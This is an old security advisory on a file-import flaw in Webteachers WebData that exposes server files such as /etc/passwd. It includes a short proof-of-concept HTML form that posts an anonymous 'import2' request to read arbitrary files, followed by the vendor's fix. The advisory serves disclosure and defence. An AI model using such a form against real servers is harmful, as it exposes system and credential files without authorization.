COMMAND
WebData
SYSTEMS AFFECTED
Webteachers WebData
PROBLEM
Following is based on a Delphis Consulting Security Advisory
DST2K0039. Delphis Consulting Internet Security Team (DCIST)
discovered the following vulnerability in WebData under Linux
(although not tested under WindowsNT we would expect the same
results).
It is possible to import any file (i.e. /etc/passwd) from the file
system which the Webserver user (i.e. nobody) has access to in to
the WebData database. This enables potenial attackers to gain
access to the contents of a number of key files (i.e. hosts.allow
/ hosts.deny .etc) by browsing the database afterwards. Note: You
need at least a member account to perform this action.
The below script won't just work but will require a little brain
power to get working with your database. This enables a user to
import anonymously any file that the web user has access to.
Example script:
<form action="http://127.0.0.1/cgi-bin/webdata_test.pl" method="post">
<INPUT TYPE=TEXT SIZE=60 NAME="pathname"><BR>
<font size=3>Is the file comma or tab delimited?</font></B>
<select name="delimiter" size=1>
<option value="comma">comma
<option value="tab">tab
<option value="pipe">pipe
</select>
<INPUT TYPE=HIDDEN NAME="member" VALUE="anonymous">
<input type=hidden name="cgifunction" value="import2">
<BR>
<INPUT TYPE=SUBMIT VALUE="Import">
</form>
SOLUTION
A new version of Webdata has been released. The security problem
is addressed in the new version in the following manner.
Only the admin can use the "filename" method of importing.
Members must use the file upload method. The "enter the path to
the file" box does not appear on the import screen when the userid
is not "admin". The program also checks the userid during the
actual importing, so a hacker could not simply type the
querystring for a file import into the location box.